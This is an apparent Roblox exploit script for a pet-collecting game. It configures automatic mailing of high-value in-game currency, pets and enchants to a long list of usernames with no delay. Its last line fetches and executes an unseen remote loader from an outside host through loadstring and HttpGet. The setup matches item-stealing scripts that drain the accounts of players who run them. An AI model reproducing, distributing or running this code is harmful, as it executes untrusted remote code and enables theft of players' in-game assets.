script_key = "PBgqFQESzNhuTfgQatfaWcLbqQSoMvXK";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
["Diamonds"] = {Class = "Currency", Id = "Diamonds", Amount = "5m"},
["Blooming Axolotl"] = {Class = "Pet", Id = "Blooming Axolotl", Amount = 115, IsGold = false, IsRainbow = true, IsShiny = false},
["Strong Pets"] = {Class = "Enchant",Id = "Strong Pets",Tier = 7, Amount = 1},
["Lucky Eggs"] = {Class = "Enchant",Id = "Lucky Eggs",Tier = 7, Amount = 1},
["Criticals"] = {Class = "Enchant",Id = "Criticals",Tier = 7, Amount = 1},
["Treasure Hunter"] = {Class = "Enchant",Id = "Treasure Hunter",Tier = 7, Amount = 1},
["Tap Power"] = {Class = "Enchant",Id = "Tap Power",Tier = 7, Amount = 1},
}
_G.GMAIL_RECEIVERS = {
"jackVaporwhirl",
"Dylanbreeze_YT",
"Nickjolt44",
"Christopher_Tiger200",
"TheRealIgnite_Pixel",
"ITSEMMA_whirl90",
"zo3_Wav3YT",
"MrsScarlettCinder",
"MrsThomas_Nebula",
"OrbitMiner10",
"NexusEmily_Drift2012",
"Mrsriv3rIgnit3",
"Mrswendy_Flash",
"Knight_pine",
"MrsvinceQuest202215",
"MrsEvelynInk",
"Jilljumpy2013",
"TheRealNancy_STAR201",
"maryZapPixel36",
"TheRealEliseSpectre2",
"MRSZOE_Ink2022",
"MrsNatalie_pine",
"Th3R3alChristoph3roa",
"TheRealFlickVap0r",
"Th3R3alMatth3wShin3",
"MrsKayleeGolden",
"ClaireNight38",
"ItsAlan_Puddl3",
"EvanQuack2022",
"Th3R3alZo3P3bbl3",
"TheRealLilyFableFlam",
"ItsCalebVelvet",
"elmShine19",
"MikeOozeTwist",
"J0shuajumpyYT",
"JosephSpirit48",
"ITSVALE_Primal",
"HarryIce2008",
"MrsEmilySurge",
"TheRealJillsparkle22",
"ItsSamanthaPandatwir",
"FlickerGolden",
"ItsCart3rCosmo2022",
"ItsJosephArrow",
"valeZapPanda",
"EzraCom3t",
"MrsMunchFox",
"MrsJesterStarryisle",
"sethSaddleThunderbol",
"TheRealsplash_Sparkl",
"HannahDragon202147",
"TomCyberRadiance62",
"NexusTwistNeonStar20",
"SamRushGamer68",
"MrsRoseSapphire2011",
"TheRealJoshuaProwler",
"NexusOblivionzippy",
"NexusNick_Golden",
"MrsFaith_Cind3r",
"ItsAlexanderEnigma20",
"Lily_twist2022",
"vinceDewClaw",
"paulridge37",
"TheRealjaneSpark2016",
"TheRealYonderRiftCyb",
"KiteProPaladin",
"MilaSonicbrook",
"bethThunder53",
"TheRealHarper_Viper",
"NexusNinjaHyper",
"danaGlimmer15",
"chrisQueenIce",
"TheRealBellaVenom202",
"Frank_Vip3r",
"TheRealFalconHaze",
"TheRealAuroraEpic",
"Th3R3alHarryHawk2018",
"uma_Blaze71",
"ItsWilliamHunterYond",
"NexusVaporVibe",
"THEREALSCOTT_Scorch",
"NexusJayden_Wobble",
"IAN_Oblivion92",
"ItsMiaRift73",
"M3t3or_Frost",
"ItsPaisleyhill",
"Faith_Aur0ra",
"Samuel_W0bble",
"VictoriaVortex202459",
"ItsGalaxyScorch39",
"NexuskatehushTangle",
"Th3R3aldrift_Cind3r",
"ItsIvorytide",
"Kensand2017",
"Dave_Venom2003",
"Boulder_Dynamo2012",
"NexusEthanChaos31",
"Carterchime2006",
"ItsKatherine_GLINT",
"ItsBrooklynnHyperFro",
"MrsLukeLegend",
"Frostflake2018",
"Itswill_L3g3nd14",
"ZoeFalcon2022",
"Alexander_Rush2017",
"LUKE_Jolt2018",
"NexusAriaknoll",
"Emilyglow70",
"MrsEli_JADE",
"KaraCraze2008",
"FrostRippl3",
"ItsKiteflickbrook",
"N3xusMik3Frost",
"MRSJACKSON_Lava",
"N3xusIslaSorc3r3r",
"TheRealEliSapphire",
"Ethan_Tempest2008",
"ItsNick_Dark2021",
"AudreyLustermisty",
"ItsashGiga",
}

_G.GMAIL_DELAY  = 0
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
